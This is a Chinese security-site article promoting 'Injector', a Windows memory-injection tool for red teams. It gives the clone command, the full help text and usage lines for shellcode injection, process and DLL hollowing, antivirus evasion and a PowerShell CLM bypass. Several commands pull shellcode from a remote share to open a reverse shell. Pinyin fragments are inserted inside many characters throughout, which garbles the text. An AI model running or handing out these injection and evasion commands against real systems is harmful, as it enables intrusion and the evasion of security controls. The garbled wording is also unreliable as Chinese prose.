如何使用Injector實現(xiàn)Windows下的內(nèi)存注入
作者:Alpha_h4ck
Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。
關(guān)于Injector
Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。
Injector能做什么?
針對遠(yuǎn)程服務(wù)器和本地存儲提供Shellcode注入支持。只需指定Shellcode文件,該工具將幫助我們完成后續(xù)的所有事情。默認(rèn)情況下,工具會將Shellcode注入至exe,如果沒有找到目標(biāo)進(jìn)程,它將會創(chuàng)建一個記事本進(jìn)程,并注入其中實現(xiàn)持久化感染。
- 支持反射DLL注入,工具將下載DLL并注入遠(yuǎn)程進(jìn)程。
- 通過exe實現(xiàn)進(jìn)程鏤空。
- 使用-bypass參數(shù),以支持使用更高級的、未記錄的API來進(jìn)行進(jìn)程注入。
- 支持加密的Shellcode,比如說AES加密或異或加密等。
- 支持針對PowerShell的CLM繞過,可以直接將代碼存防止能夠執(zhí)行C#代碼的白名單文件夾中,比如說“C:\Windows\Tasks”。
- 支持DLL鏤空,通過dll實現(xiàn)。
工具下載
廣大研究人員可以使用下列命令將該項目源碼克隆至本地:
- git clone https://github.com/0xDivyanshu/Injector.git
工具幫助
- C:\Users\admin>Injector.exe
- Help Options for Xenon:
- -m Mode of operation
- -m 1 Specifies the mode as Process injection
- -m 2 Specifies the mode as Reflective DLL Injection
- -m 3 Specifies the mode as Process Hollowing
- -m 4 No injection! Give me my damn shell
- -m 5 Powershell session via CLM bypass
- -m 6 DLL hollowing
- -TempFile File location that your current user can read
- -shellcode Use shellcode
- -dll Use dll
- -decrypt-xor Specify Xor decryption for shellcode
- -pass Specifty the password for Xor decryption
- -decrypt-aes Specify aes decryption for shellcode
- -pass Specifty the password for aes decryption
- -location Specify the location i.e either server or local
- -bypass Uses enhance attempts to bypass AV
如需生成加密的Shellcode,請在Kali下使用Helper.exe。
工具使用樣例
- Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass
上述命令將解密你的Shellcode并給你一個反向Shell。
如果你不想使用加密的Shellcode,你也可以直接使用下列命令運行下列命令:
- Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt"
將其中的“-m=1”修改為“2,3,4,6”之后,就可以運行其他模式了:
- Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt
上述命令將提供要給會話,我們可以使用它來執(zhí)行IEX cradle,并獲取一個能夠繞過CLM的反向Shell。
PowerShell
你還可以使用Invoke-Exe.ps1來通過PowerShel執(zhí)行Injector:
- Invoke-Exe -loc C:\Users\john\injector.exe
項目地址
Injector:【GitHub傳送門】
責(zé)任編輯:趙寧寧
來源:
FreeBuf
